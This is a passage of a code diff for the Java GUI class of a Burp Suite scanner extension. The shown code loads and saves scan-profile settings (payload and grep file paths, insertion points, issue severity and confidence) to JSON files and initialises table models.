payloadsfile = profile_property.getpayloadsFile(); - grepsfile = profile_property.getgrepsFile(); - payloadPosition = profile_property.getPayloadPosition(); - timeOut = profile_property.getTime(); - author = profile_property.getAuthor(); - contentLength = profile_property.getContentLength(); - headers = profile_property.getHeader(); - variationAttributes = profile_property.getVariationAttributes(); - insertionPointType = profile_property.getInsertionPointType(); - - profile.textauthor.setText(author); - profile.text1.setText(name); - - if (payloadPosition == 1) { - buttonGroup9.setSelected(profile.replace.getModel(), true); - } else if (payloadPosition == 2) { - buttonGroup9.setSelected(profile.append.getModel(), true); - } - - profile.grep.removeAllElements(); - profile.payload.removeAllElements(); - profile.encoder.removeAllElements(); - profile.tag.removeAllElements(); - - profile.textpayloads.setText(payloadsfile); - profile.textgreps.setText(grepsfile); - - profile.showGreps(profile_property.getGreps()); - - if (!payloadsfile.isEmpty()) { - loadPath(payloadsfile, profile.payload); - updatePayloads(payloadsfile, profile_property); - - } else { - for (String pay : profile_property.getPayloads()) { - profile.payload.addElement(pay); - } - } - - if (profile_property.getTags() != null) { - for (String t : profile_property.getTags()) { - profile.tag.addElement(t); - } - } - - for (String enc : profile_property.getEncoder()) { - profile.encoder.addElement(enc); - } - - profile.text71.setText(contenttype); - profile.text72.setText(responsecode); - - profile.check8.setSelected(urlencode); - profile.text5.setText(charstourlencode); - profile.excludehttp.setSelected(excludeHTTP); - profile.onlyhttp.setSelected(onlyHTTP); - - if (timeOut.equals("0")) { - profile.texttime.setText(""); - } else { - profile.texttime.setText(timeOut); - } - - if (contentLength.equals("0")) { - profile.textcl.setText(""); - } else { - profile.textcl.setText(contentLength); - } - - switch (matchtype) { - case 1: - buttonGroup4.setSelected(profile.radio4.getModel(), true); - break; - case 2: - buttonGroup4.setSelected(profile.radio3.getModel(), true); - break; - case 3: - buttonGroup4.setSelected(profile.radio12.getModel(), true); - break; - case 4: - buttonGroup4.setSelected(profile.radio22.getModel(), true); - break; - case 5: - buttonGroup4.setSelected(profile.radiotime.getModel(), true); - break; - case 6: - buttonGroup4.setSelected(profile.radiocl.getModel(), true); - break; - case 7: - buttonGroup4.setSelected(profile.variationsRadio.getModel(), true); - break; - case 8: - buttonGroup4.setSelected(profile.invariationsRadio.getModel(), true); - break; - default: - buttonGroup4.clearSelection(); - break; - } - - switch (redirtype) { - case 1: - buttonGroup8.setSelected(profile.rb1.getModel(), true); - break; - case 2: - buttonGroup8.setSelected(profile.rb2.getModel(), true); - break; - case 3: - buttonGroup8.setSelected(profile.rb3.getModel(), true); - break; - case 4: - buttonGroup8.setSelected(profile.rb4.getModel(), true); - break; - default: - buttonGroup8.clearSelection(); - break; - } - - profile.showHeaders(headers); - - setSelectedVariations(false, profile); - - if (variationAttributes.contains("status_code")) { - profile.status_code.setSelected(true); - } - if (variationAttributes.contains("input_image_labels")) { - profile.input_image_labels.setSelected(true); - } - if (variationAttributes.contains("non_hidden_form_input_types")) { - profile.non_hidden_form_input_types.setSelected(true); - } - if (variationAttributes.contains("page_title")) { - profile.page_title.setSelected(true); - } - if (variationAttributes.contains("visible_text")) { - profile.visible_text.setSelected(true); - } - if (variationAttributes.contains("button_submit_labels")) { - profile.button_submit_labels.setSelected(true); - } - if (variationAttributes.contains("div_ids")) { - profile.div_ids.setSelected(true); - } - if (variationAttributes.contains("word_count")) { - profile.word_count.setSelected(true); - } - if (variationAttributes.contains("content_type")) { - profile.content_type.setSelected(true); - } - if (variationAttributes.contains("outbound_edge_tag_names")) { - profile.outbound_edge_tag_names.setSelected(true); - } - if (variationAttributes.contains("whole_body_content")) { - profile.whole_body_content.setSelected(true); - } - if (variationAttributes.contains("etag_header")) { - profile.etag_header.setSelected(true); - } - if (variationAttributes.contains("visible_word_count")) { - profile.visible_word_count.setSelected(true); - } - if (variationAttributes.contains("content_length")) { - profile.content_length.setSelected(true); - } - if (variationAttributes.contains("header_tags")) { - profile.header_tags.setSelected(true); - } - if (variationAttributes.contains("tag_ids")) { - profile.tag_ids.setSelected(true); - } - if (variationAttributes.contains("comments")) { - profile.comments.setSelected(true); - } - if (variationAttributes.contains("line_count")) { - profile.line_count.setSelected(true); - } - if (variationAttributes.contains("set_cookie_names")) { - profile.set_cookie_names.setSelected(true); - } - if (variationAttributes.contains("last_modified_header")) { - profile.last_modified_header.setSelected(true); - } - if (variationAttributes.contains("first_header_tag")) { - profile.first_header_tag.setSelected(true); - } - if (variationAttributes.contains("tag_names")) { - profile.tag_names.setSelected(true); - } - if (variationAttributes.contains("input_submit_labels")) { - profile.input_submit_labels.setSelected(true); - } - if (variationAttributes.contains("outbound_edge_count")) { - profile.outbound_edge_count.setSelected(true); - } - if (variationAttributes.contains("initial_body_content")) { - profile.initial_body_content.setSelected(true); - } - if (variationAttributes.contains("content_location")) { - profile.content_location.setSelected(true); - } - if (variationAttributes.contains("limited_body_content")) { - profile.limited_body_content.setSelected(true); - } - if (variationAttributes.contains("canonical_link")) { - profile.canonical_link.setSelected(true); - } - if (variationAttributes.contains("css_classes")) { - profile.css_classes.setSelected(true); - } - if (variationAttributes.contains("location")) { - profile.location.setSelected(true); - } - if (variationAttributes.contains("anchor_labels")) { - profile.anchor_labels.setSelected(true); - } - - profile.setSelectedInsertionPointType(false); - - if (insertionPointType.contains(18)) { - profile.All.setSelected(true); - } - if (insertionPointType.contains(65)) { - profile.extensionprovided.setSelected(true); - } - if (insertionPointType.contains(32)) { - profile.header.setSelected(true); - } - if (insertionPointType.contains(36)) { - profile.entirebody.setSelected(true); - } - if (insertionPointType.contains(7)) { - profile.paramamf.setSelected(true); - } - if (insertionPointType.contains(1)) { - profile.parambody.setSelected(true); - } - if (insertionPointType.contains(2)) { - profile.paramcookie.setSelected(true); - } - if (insertionPointType.contains(6)) { - profile.paramjson.setSelected(true); - } - if (insertionPointType.contains(33)) { - profile.urlpathfolder.setSelected(true); - } - if (insertionPointType.contains(5)) { - profile.parammultipartattr.setSelected(true); - } - if (insertionPointType.contains(35)) { - profile.paramnamebody.setSelected(true); - } - if (insertionPointType.contains(34)) { - profile.paramnameurl.setSelected(true); - } - if (insertionPointType.contains(64)) { - profile.userprovided.setSelected(true); - } - if (insertionPointType.contains(0)) { - profile.paramurl.setSelected(true); - } - if (insertionPointType.contains(3)) { - profile.paramxml.setSelected(true); - } - if (insertionPointType.contains(4)) { - profile.paramxmlattr.setSelected(true); - } - if (insertionPointType.contains(37)) { - profile.urlpathfilename.setSelected(true); - } - if (insertionPointType.contains(127)) { - profile.unknown.setSelected(true); - } - - profile.check1.setSelected(casesensitive); - profile.check4.setSelected(notresponse); - profile.check71.setSelected(iscontenttype); - profile.check72.setSelected(isresponsecode); - profile.negativeCT.setSelected(negativect); - profile.negativeRC.setSelected(negativerc); - profile.text4.setText(issuename); - profile.textarea1.setText(issuedetail); - profile.textarea2.setText(issuebackground); - profile.textarea3.setText(remediationdetail); - profile.textarea4.setText(remediationbackground); - text11.setText(filename); - profile.sp1.setValue(maxRedir); - - switch (issueseverity) { - case "High": - buttonGroup2.setSelected(profile.radio5.getModel(), true); - break; - case "Medium": - buttonGroup2.setSelected(profile.radio6.getModel(), true); - break; - case "Low": - buttonGroup2.setSelected(profile.radio7.getModel(), true); - break; - case "Information": - buttonGroup2.setSelected(profile.radio8.getModel(), true); - break; - default: - break; - } - - switch (issueconfidence) { - case "Certain": - buttonGroup3.setSelected(profile.radio9.getModel(), true); - break; - case "Firm": - buttonGroup3.setSelected(profile.radio10.getModel(), true); - break; - case "Tentative": - buttonGroup3.setSelected(profile.radio11.getModel(), true); - break; - default: - break; - } - } catch (Exception e) { - callbacks.printError("BurpBountyGui line 658:" + e.getMessage()); - } - } - - public void saveActiveAttackValues(ActiveProfile profile) { - headers = new ArrayList(); - variationAttributes = new ArrayList(); - insertionPointType = new ArrayList(); - //Save attack with fields values - try { - //get GUI values - ProfilesProperties newfile = new ProfilesProperties(); - - if (profile.text1.getText().length() >= 35) { - newfile.setName(profile.text1.getText().substring(0, 34)); - } else { - newfile.setName(profile.text1.getText()); - } - - if (profile.textauthor.getText().length() >= 35) { - newfile.setAuthor(profile.textauthor.getText().substring(0, 34)); - } else { - newfile.setAuthor(profile.textauthor.getText()); - } - - newfile.setScanner(1); - - if (profile.replace.isSelected()) { - newfile.setPayloadPosition(1); - } else if (profile.append.isSelected()) { - newfile.setPayloadPosition(2); - } else { - newfile.setPayloadPosition(1); - } - - newfile.setEnabled(true); - List encoders = new ArrayList(); - List payloads = new ArrayList(); - List greps = new ArrayList(); - List tags = new ArrayList(); - - newfile.setPayloadsFile(profile.textpayloads.getText()); - for (int i = 0; i < profile.list1.getModel().getSize(); i++) { - Object item = profile.list1.getModel().getElementAt(i); - if (!item.toString().isEmpty()) { - payloads.add(item.toString().replaceAll("\r", "").replaceAll("\n", "")); - } - } - newfile.setPayloads(payloads); - - newfile.setGrepsFile(profile.textgreps.getText()); - for (int i = 0; i < profile.modelgrep.getRowCount(); i++) { - if (!profile.modelgrep.getValueAt(i, 2).toString().isEmpty()) { - greps.add(profile.modelgrep.getValueAt(i, 0).toString() + "," + profile.modelgrep.getValueAt(i, 1).toString() + "," + profile.modelgrep.getValueAt(i, 2).toString()); - } - } - newfile.setGreps(greps); - - for (int row = 0; row < profile.model4.getRowCount(); row++) { - headers.add(new Headers((String) profile.model4.getValueAt(row, 0), (String) profile.model4.getValueAt(row, 1), (String) profile.model4.getValueAt(row, 2), (String) profile.model4.getValueAt(row, 3))); - } - newfile.setHeader(headers); - - for (int i = 0; i < profile.listtag.getModel().getSize(); i++) { - Object item = profile.listtag.getModel().getElementAt(i); - if (!item.toString().isEmpty()) { - tags.add(item.toString().replaceAll("\r", "").replaceAll("\n", "")); + this.callbacks = parent.callbacks; + this.helpers = callbacks.getHelpers(); + this.parent = parent; + filename = ""; + model4 = new DefaultTableModel(); + model9 = new DefaultTableModel(); + model10 = new DefaultTableModel(); + modeltagmanager = new DefaultTableModel(); + dashboardmodel = new DefaultTableModel(); + rulemodel = new DefaultTableModel(); + allprofiles = new JsonArray(); + allrules = new JsonArray(); + activeprofiles = new JsonArray(); + passiveresprofiles = new JsonArray(); + passivereqprofiles = new JsonArray(); + tagmanager = new DefaultListModel(); + + if (callbacks.loadExtensionSetting("filename") != null) { + filename = callbacks.loadExtensionSetting("filename"); + if (filename.endsWith(File.separator)) { + profiles_directory = filename ; + } else { + profiles_directory = filename + File.separator ; } - } - if (!tags.contains("All")) { - tags.add("All"); - newfile.setTags(tags); } else { - newfile.setTags(tags); - } - - for (int i = 0; i < profile.list3.getModel().getSize(); i++) { - Object item = profile.list3.getModel().getElementAt(i); - if (!item.toString().isEmpty()) { - encoders.add(item.toString().replaceAll("\r", "").replaceAll("\n", "")); + filename = System.getProperty("user.home"); + if (filename.endsWith(File.separator)) { + profiles_directory = filename ; + } else { + profiles_directory = filename + File.separator; } } - newfile.setEncoder(encoders); - newfile.setCharsToUrlEncode(profile.text5.getText()); - newfile.setUrlEncode(profile.check8.isSelected()); - newfile.setExcludeHTTP(profile.excludehttp.isSelected()); - newfile.setOnlyHTTP(profile.onlyhttp.isSelected()); - newfile.setContentType(profile.text71.getText()); - newfile.setResponseCode(profile.text72.getText()); - - if (profile.texttime.getText().isEmpty()) { - newfile.setTime(profile.texttime.getText()); - } else { - newfile.setTime(profile.texttime.getText()); - } - - if (profile.textcl.getText().isEmpty()) { - newfile.setContentLength(profile.textcl.getText()); - } else { - newfile.setContentLength(profile.textcl.getText()); - } - - if (profile.radio4.isSelected()) { - newfile.setMatchType(1); - } else if (profile.radio3.isSelected()) { - newfile.setMatchType(2); - } else if (profile.radio12.isSelected()) { - newfile.setMatchType(3); - } else if (profile.radio22.isSelected()) { - newfile.setMatchType(4); - } else if (profile.radiotime.isSelected()) { - newfile.setMatchType(5); - } else if (profile.radiocl.isSelected()) { - newfile.setMatchType(6); - } else if (profile.variationsRadio.isSelected()) { - newfile.setMatchType(7); - } else if (profile.invariationsRadio.isSelected()) { - newfile.setMatchType(8); - } else { - newfile.setMatchType(0); - } - - if (profile.rb1.isSelected()) { - newfile.setRedirType(1); - } else if (profile.rb2.isSelected()) { - newfile.setRedirType(2); - } else if (profile.rb3.isSelected()) { - newfile.setRedirType(3); - } else if (profile.rb4.isSelected()) { - newfile.setRedirType(4); - } else { - newfile.setRedirType(0); - } - - if (profile.status_code.isSelected()) { - variationAttributes.add("status_code"); - } - if (profile.input_image_labels.isSelected()) { - variationAttributes.add("input_image_labels"); - } - if (profile.non_hidden_form_input_types.isSelected()) { - variationAttributes.add("non_hidden_form_input_types"); - } - if (profile.page_title.isSelected()) { - variationAttributes.add("page_title"); - } - if (profile.visible_text.isSelected()) { - variationAttributes.add("visible_text"); - } - if (profile.button_submit_labels.isSelected()) { - variationAttributes.add("button_submit_labels"); - } - if (profile.div_ids.isSelected()) { - variationAttributes.add("div_ids"); - } - if (profile.word_count.isSelected()) { - variationAttributes.add("word_count"); - } - if (profile.content_type.isSelected()) { - variationAttributes.add("content_type"); - } - if (profile.outbound_edge_tag_names.isSelected()) { - variationAttributes.add("outbound_edge_tag_names"); - } - if (profile.whole_body_content.isSelected()) { - variationAttributes.add("whole_body_content"); - } - if (profile.etag_header.isSelected()) { - variationAttributes.add("etag_header"); - } - if (profile.visible_word_count.isSelected()) { - variationAttributes.add("visible_word_count"); - } - if (profile.content_length.isSelected()) { - variationAttributes.add("content_length"); - } - if (profile.header_tags.isSelected()) { - variationAttributes.add("header_tags"); - } - if (profile.tag_ids.isSelected()) { - variationAttributes.add("tag_ids"); - } - if (profile.comments.isSelected()) { - variationAttributes.add("comments"); - } - if (profile.line_count.isSelected()) { - variationAttributes.add("line_count"); - } - if (profile.set_cookie_names.isSelected()) { - variationAttributes.add("set_cookie_names"); - } - if (profile.last_modified_header.isSelected()) { - variationAttributes.add("last_modified_header"); - } - if (profile.first_header_tag.isSelected()) { - variationAttributes.add("first_header_tag"); - } - if (profile.tag_names.isSelected()) { - variationAttributes.add("tag_names"); - } - if (profile.input_submit_labels.isSelected()) { - variationAttributes.add("input_submit_labels"); - } - if (profile.outbound_edge_count.isSelected()) { - variationAttributes.add("outbound_edge_count"); - } - if (profile.initial_body_content.isSelected()) { - variationAttributes.add("initial_body_content"); - } - if (profile.content_location.isSelected()) { - variationAttributes.add("content_location"); - } - if (profile.limited_body_content.isSelected()) { - variationAttributes.add("limited_body_content"); - } - if (profile.canonical_link.isSelected()) { - variationAttributes.add("canonical_link"); - } - if (profile.css_classes.isSelected()) { - variationAttributes.add("css_classes"); - } - if (profile.location.isSelected()) { - variationAttributes.add("location"); - } - if (profile.anchor_labels.isSelected()) { - variationAttributes.add("anchor_labels"); - } - - newfile.setVariationAttributes(variationAttributes); - - if (profile.All.isSelected()) { - insertionPointType.add(18); - insertionPointType.add(65); - insertionPointType.add(32); - insertionPointType.add(36); - insertionPointType.add(7); - insertionPointType.add(1); - insertionPointType.add(2); - insertionPointType.add(6); - insertionPointType.add(33); - insertionPointType.add(5); - insertionPointType.add(35); - insertionPointType.add(34); - insertionPointType.add(64); - insertionPointType.add(0); - insertionPointType.add(3); - insertionPointType.add(4); - insertionPointType.add(37); - insertionPointType.add(127); - } - - if (profile.extensionprovided.isSelected()) { - insertionPointType.add(65); - } - if (profile.header.isSelected()) { - insertionPointType.add(32); - } - if (profile.entirebody.isSelected()) { - insertionPointType.add(36); - } - if (profile.paramamf.isSelected()) { - insertionPointType.add(7); - } - if (profile.parambody.isSelected()) { - insertionPointType.add(1); - } - if (profile.paramcookie.isSelected()) { - insertionPointType.add(2); - } - if (profile.paramjson.isSelected()) { - insertionPointType.add(6); - } - if (profile.urlpathfolder.isSelected()) { - insertionPointType.add(33); - } - if (profile.parammultipartattr.isSelected()) { - insertionPointType.add(5); - } - if (profile.paramnamebody.isSelected()) { - insertionPointType.add(35); - } - if (profile.paramnameurl.isSelected()) { - insertionPointType.add(34); - } - if (profile.userprovided.isSelected()) { - insertionPointType.add(64); - } - if (profile.paramurl.isSelected()) { - insertionPointType.add(0); - } - if (profile.paramxml.isSelected()) { - insertionPointType.add(3); - } - if (profile.paramxmlattr.isSelected()) { - insertionPointType.add(4); - } - if (profile.urlpathfilename.isSelected()) { - insertionPointType.add(37); - } - if (profile.unknown.isSelected()) { - insertionPointType.add(127); - } - if (insertionPointType.isEmpty()) { - insertionPointType.add(18); - insertionPointType.add(65); - insertionPointType.add(32); - insertionPointType.add(36); - insertionPointType.add(7); - insertionPointType.add(1); - insertionPointType.add(2); - insertionPointType.add(6); - insertionPointType.add(33); - insertionPointType.add(5); - insertionPointType.add(35); - insertionPointType.add(34); - insertionPointType.add(64); - insertionPointType.add(0); - insertionPointType.add(3); - insertionPointType.add(4); - insertionPointType.add(37); - insertionPointType.add(127); - } else { - newfile.setInsertionPointType(insertionPointType); - } - - newfile.setCaseSensitive(profile.check1.isSelected()); - newfile.setNotResponse(profile.check4.isSelected()); - newfile.setIsContentType(profile.check71.isSelected()); - newfile.setIsResponseCode(profile.check72.isSelected()); - newfile.setNegativeCT(profile.negativeCT.isSelected()); - newfile.setNegativeRC(profile.negativeRC.isSelected()); - newfile.setIssueName(profile.text4.getText()); - newfile.setIssueDetail(profile.textarea1.getText()); - newfile.setIssueBackground(profile.textarea2.getText()); - newfile.setRemediationDetail(profile.textarea3.getText()); - newfile.setRemediationBackground(profile.textarea4.getText()); - newfile.setMaxRedir((Integer) profile.sp1.getValue()); - - if (profile.radio5.isSelected()) { - newfile.setIssueSeverity("High"); - } else if (profile.radio6.isSelected()) { - newfile.setIssueSeverity("Medium"); - } else if (profile.radio7.isSelected()) { - newfile.setIssueSeverity("Low"); - } else if (profile.radio8.isSelected()) { - newfile.setIssueSeverity("Information"); - } else { - newfile.setIssueSeverity(""); - } - - if (profile.radio9.isSelected()) { - newfile.setIssueConfidence("Certain"); - } else if (profile.radio10.isSelected()) { - newfile.setIssueConfidence("Firm"); - } else if (profile.radio11.isSelected()) { - newfile.setIssueConfidence("Tentative"); - } else { - newfile.setIssueConfidence(""); - } - - //Save start - Gson gson = new Gson(); - - JsonArray ijson = new JsonArray(); - List newjson = gson.fromJson(ijson, new TypeToken>() { - }.getType()); - newjson.add(newfile); + createDirectories(profiles_directory); - String json = gson.toJson(newjson); + model = new DefaultTableModel() { - //Write JSON String to file - FileOutputStream fileStream; - - if (profile.text1.getText().length() >= 35) { - fileStream = new FileOutputStream(new File(profiles_directory + profile.text1.getText().substring(0, 34).concat(".bb"))); - } else { - fileStream = new FileOutputStream(new File(profiles_directory + profile.text1.getText().concat(".bb"))); - } - - OutputStreamWriter writer = new OutputStreamWriter(fileStream, "UTF-8"); - writer.write(json); - writer.close(); - fileStream.close(); - - } catch (IOException e) { - callbacks.printError("BurpBountyGui line 1027:"); - } - } - - public void setResponseAttackValues(String profiles, ResponseProfile profile) { - //Set Attack values when select from main combobox - try { - Gson gson = new Gson(); - JsonArray json = initJson(); - ProfilesProperties profile_property = new ProfilesProperties(); - - if (json != null) { - for (JsonElement pa : json) { - JsonObject bbObj = pa.getAsJsonObject(); - if (bbObj.get("Name").getAsString().equals(profiles)) { - profile_property = gson.fromJson(bbObj.toString(), ProfilesProperties.class - ); + @Override + public Class getColumnClass(int columnIndex) { + Class clazz = String.class; + switch (columnIndex) { + case 0: + clazz = Boolean.class; + break; } - + return clazz; } - } - name = profile_property.getName(); - scanner = profile_property.getScanner(); - casesensitive = profile_property.getCaseSensitive(); - notresponse = profile_property.getNotResponse(); - matchtype = profile_property.getMatchType(); - issuename = profile_property.getIssueName(); - issueseverity = profile_property.getIssueSeverity(); - issueconfidence = profile_property.getIssueConfidence(); - issuedetail = profile_property.getIssueDetail(); - issuebackground = profile_property.getIssueBackground(); - remediationdetail = profile_property.getRemediationDetail(); - remediationbackground = profile_property.getRemediationBackground(); - iscontenttype = profile_property.getIsContentType(); - isresponsecode = profile_property.getIsResponseCode(); - contenttype = profile_property.getContentType(); - responsecode = profile_property.getResponseCode(); - excludeHTTP = profile_property.getExcludeHTTP(); - onlyHTTP = profile_property.getOnlyHTTP(); - negativect = profile_property.getNegativeCT(); - negativerc = profile_property.getNegativeRC(); - redirtype = profile_property.getRedirection(); - maxRedir = profile_property.getMaxRedir(); - payloadsfile = profile_property.getpayloadsFile(); - grepsfile = profile_property.getgrepsFile(); - payloadPosition = profile_property.getPayloadPosition(); - timeOut = profile_property.getTime(); - author = profile_property.getAuthor(); - contentLength = profile_property.getContentLength(); - headers = profile_property.getHeader(); - variationAttributes = profile_property.getVariationAttributes(); - insertionPointType = profile_property.getInsertionPointType(); - - profile.textauthor.setText(author); - profile.text1.setText(name); - - if (profile_property.getTags() != null) { - for (String t : profile_property.getTags()) { - profile.tag.addElement(t); + @Override + public boolean isCellEditable(int row, int column) { + return column == 0; } - } + }; - profile.showGreps(profile_property.getGreps()); - - profile.text71.setText(contenttype); - profile.text72.setText(responsecode); - - profile.excludehttp.setSelected(excludeHTTP); - profile.onlyhttp.setSelected(onlyHTTP); - - switch (matchtype) { - case 1: - buttonGroup4.setSelected(profile.radio4.getModel(), true); - break; - case 2: - buttonGroup4.setSelected(profile.radio3.getModel(), true); - break; - default: - buttonGroup4.clearSelection(); - break; - } - - switch (redirtype) { - case 1: - buttonGroup8.setSelected(profile.rb1.getModel(), true); - break; - case 2: - buttonGroup8.setSelected(profile.rb2.getModel(), true); - break; - case 3: - buttonGroup8.setSelected(profile.rb3.getModel(), true); - break; - case 4: - buttonGroup8.setSelected(profile.rb4.getModel(), true); - break; - default: - buttonGroup8.clearSelection(); - break; - } - - profile.check1.setSelected(casesensitive); - profile.check4.setSelected(notresponse); - profile.check71.setSelected(iscontenttype); - profile.check72.setSelected(isresponsecode); - profile.negativeCT.setSelected(negativect); - profile.negativeRC.setSelected(negativerc); - profile.text4.setText(issuename); - profile.textarea1.setText(issuedetail); - profile.textarea2.setText(issuebackground); - profile.textarea3.setText(remediationdetail); - profile.textarea4.setText(remediationbackground); - text11.setText(filename); - profile.sp1.setValue(maxRedir); - - switch (issueseverity) { - case "High": - buttonGroup2.setSelected(profile.radio5.getModel(), true); - break; - case "Medium": - buttonGroup2.setSelected(profile.radio6.getModel(), true); - break; - case "Low": - buttonGroup2.setSelected(profile.radio7.getModel(), true); - break; - case "Information": - buttonGroup2.setSelected(profile.radio8.getModel(), true); - break; - default: - break; - } - - switch (issueconfidence) { - case "Certain": - buttonGroup3.setSelected(profile.radio9.getModel(), true); - break; - case "Firm": - buttonGroup3.setSelected(profile.radio10.getModel(), true); - break; - case "Tentative": - buttonGroup3.setSelected(profile.radio11.getModel(), true); - break; - default: - break; - } - } catch (Exception e) { - callbacks.printError("BurpBountyGui line 1180:" + e.getMessage()); - } - } - - public void saveResponseAttackValues(ResponseProfile profile) { - variationAttributes = new ArrayList(); - insertionPointType = new ArrayList(); - //Save attack with fields values - try { - //get GUI values - ProfilesProperties newfile = new ProfilesProperties(); + model1 = new DefaultTableModel() { - if (profile.text1.getText().length() >= 35) { - newfile.setName(profile.text1.getText().substring(0, 34)); - } else { - newfile.setName(profile.text1.getText()); - } - - if (profile.textauthor.getText().length() >= 35) { - newfile.setAuthor(profile.textauthor.getText().substring(0, 34)); - } else { - newfile.setAuthor(profile.textauthor.getText()); - } - - newfile.setScanner(2); - - newfile.setEnabled(true); - List greps = new ArrayList(); - List tags = new ArrayList(); - - newfile.setGrepsFile(profile.textgreps.getText()); - String a = profile.textgreps.getText(); - for (int i = 0; i < profile.modelgrep.getRowCount(); i++) { - if (!profile.modelgrep.getValueAt(i, 2).toString().isEmpty()) { - greps.add(profile.modelgrep.getValueAt(i, 0).toString() + "," + profile.modelgrep.getValueAt(i, 1).toString() + "," + profile.modelgrep.getValueAt(i, 2).toString()); + @Override + public Class getColumnClass(int columnIndex) { + Class clazz = String.class; + switch (columnIndex) { + case 0: + clazz = Boolean.class; + break; + } + return clazz; } - } - newfile.setGreps(greps); - for (int i = 0; i < profile.listtag.getModel().getSize(); i++) { - Object item = profile.listtag.getModel().getElementAt(i); - if (!item.toString().isEmpty()) { - tags.add(item.toString().replaceAll("\r", "").replaceAll("\n", "")); + @Override + public boolean isCellEditable(int row, int column) { + return column == 0; } - } - if (!tags.contains("All")) { - tags.add("All"); - newfile.setTags(tags); - } else { - newfile.setTags(tags); - } - - if (profile.radio4.isSelected()) { - newfile.setMatchType(1); - } else if (profile.radio3.isSelected()) { - newfile.setMatchType(2); - } else { - newfile.setMatchType(0); - } - - newfile.setExcludeHTTP(profile.excludehttp.isSelected()); - newfile.setOnlyHTTP(profile.onlyhttp.isSelected()); - newfile.setContentType(profile.text71.getText()); - newfile.setResponseCode(profile.text72.getText()); - - if (profile.rb1.isSelected()) { - newfile.setRedirType(1); - } else if (profile.rb2.isSelected()) { - newfile.setRedirType(2); - } else if (profile.rb3.isSelected()) { - newfile.setRedirType(3); - } else if (profile.rb4.isSelected()) { - newfile.setRedirType(4); - } else { - newfile.setRedirType(0); - } - - newfile.setVariationAttributes(variationAttributes); - - newfile.setInsertionPointType(insertionPointType); - - newfile.setCaseSensitive(profile.check1.isSelected()); - newfile.setNotResponse(profile.check4.isSelected()); - newfile.setIsContentType(profile.check71.isSelected()); - newfile.setIsResponseCode(profile.check72.isSelected()); - newfile.setNegativeCT(profile.negativeCT.isSelected()); - newfile.setNegativeRC(profile.negativeRC.isSelected()); - newfile.setIssueName(profile.text4.getText()); - newfile.setIssueDetail(profile.textarea1.getText()); - newfile.setIssueBackground(profile.textarea2.getText()); - newfile.setRemediationDetail(profile.textarea3.getText()); - newfile.setRemediationBackground(profile.textarea4.getText()); - newfile.setMaxRedir((Integer) profile.sp1.getValue()); - - if (profile.radio5.isSelected()) { - newfile.setIssueSeverity("High"); - } else if (profile.radio6.isSelected()) { - newfile.setIssueSeverity("Medium"); - } else if (profile.radio7.isSelected()) { - newfile.setIssueSeverity("Low"); - } else if (profile.radio8.isSelected()) { - newfile.setIssueSeverity("Information"); - } else { - newfile.setIssueSeverity(""); - } - - if (profile.radio9.isSelected()) { - newfile.setIssueConfidence("Certain"); - } else if (profile.radio10.isSelected()) { - newfile.setIssueConfidence("Firm"); - } else if (profile.radio11.isSelected()) { - newfile.setIssueConfidence("Tentative"); - } else { - newfile.setIssueConfidence(""); - } - - //Save start - Gson gson = new Gson(); - - JsonArray ijson = new JsonArray(); - List newjson = gson.fromJson(ijson, new TypeToken>() { - }.getType()); - newjson.add(newfile); - - String json = gson.toJson(newjson); - - //Write JSON String to file - FileOutputStream fileStream; - - if (profile.text1.getText().length() >= 35) { - fileStream = new FileOutputStream(new File(profiles_directory + profile.text1.getText().substring(0, 34).concat(".bb"))); - } else { - fileStream = new FileOutputStream(new File(profiles_directory + profile.text1.getText().concat(".bb"))); - } - - OutputStreamWriter writer = new OutputStreamWriter(fileStream, "UTF-8"); - writer.write(json); - writer.close(); - fileStream.close(); - - } catch (IOException e) { - callbacks.printError("BurpBountyGui line 1323:"); - } - } - - public void setRequestAttackValues(String profiles, RequestProfile profile) { - //Set Attack values when select from main combobox - try { - Gson gson = new Gson(); - JsonArray json = initJson(); - ProfilesProperties profile_property = new ProfilesProperties(); - - if (json != null) { - for (JsonElement pa : json) { - JsonObject bbObj = pa.getAsJsonObject(); - if (bbObj.get("Name").getAsString().equals(profiles)) { - profile_property = gson.fromJson(bbObj.toString(), ProfilesProperties.class - ); + }; + + model2 = new DefaultTableModel() { + @Override + public Class getColumnClass(int columnIndex) { + Class clazz = String.class; + switch (columnIndex) { + case 0: + clazz = Boolean.class; + break; } - + return clazz; } - } - name = profile_property.getName(); - scanner = profile_property.getScanner(); - casesensitive = profile_property.getCaseSensitive(); - notresponse = profile_property.getNotResponse(); - matchtype = profile_property.getMatchType(); - issuename = profile_property.getIssueName(); - issueseverity = profile_property.getIssueSeverity(); - issueconfidence = profile_property.getIssueConfidence(); - issuedetail = profile_property.getIssueDetail(); - issuebackground = profile_property.getIssueBackground(); - remediationdetail = profile_property.getRemediationDetail(); - remediationbackground = profile_property.getRemediationBackground(); - iscontenttype = profile_property.getIsContentType(); - isresponsecode = profile_property.getIsResponseCode(); - contenttype = profile_property.getContentType(); - responsecode = profile_property.getResponseCode(); - excludeHTTP = profile_property.getExcludeHTTP(); - onlyHTTP = profile_property.getOnlyHTTP(); - negativect = profile_property.getNegativeCT(); - negativerc = profile_property.getNegativeRC(); - redirtype = profile_property.getRedirection(); - maxRedir = profile_property.getMaxRedir(); - payloadsfile = profile_property.getpayloadsFile(); - grepsfile = profile_property.getgrepsFile(); - payloadPosition = profile_property.getPayloadPosition(); - timeOut = profile_property.getTime(); - author = profile_property.getAuthor(); - contentLength = profile_property.getContentLength(); - headers = profile_property.getHeader(); - variationAttributes = profile_property.getVariationAttributes(); - insertionPointType = profile_property.getInsertionPointType(); - - profile.textauthor.setText(author); - profile.text1.setText(name); - - profile.grep.removeAllElements(); - profile.tag.removeAllElements(); - - profile.textgreps.setText(grepsfile); - - profile.showGreps(profile_property.getGreps()); - - if (profile_property.getTags() != null) { - for (String t : profile_property.getTags()) { - profile.tag.addElement(t); + @Override + public boolean isCellEditable(int row, int column) { + return column == 0; } - } + }; - switch (matchtype) { - case 1: - buttonGroup4.setSelected(profile.radio4.getModel(), true); - break; - case 2: - buttonGroup4.setSelected(profile.radio3.getModel(), true); - break; - default: - buttonGroup4.clearSelection(); - break; - } - - profile.check1.setSelected(casesensitive); - profile.check4.setSelected(notresponse); - profile.text4.setText(issuename); - profile.textarea1.setText(issuedetail); - profile.textarea2.setText(issuebackground); - profile.textarea3.setText(remediationdetail); - profile.textarea4.setText(remediationbackground); + //main + initComponents(); text11.setText(filename); - - switch (issueseverity) { - case "High": - buttonGroup2.setSelected(profile.radio5.getModel(), true); - break; - case "Medium": - buttonGroup2.setSelected(profile.radio6.getModel(), true); - break; - case "Low": - 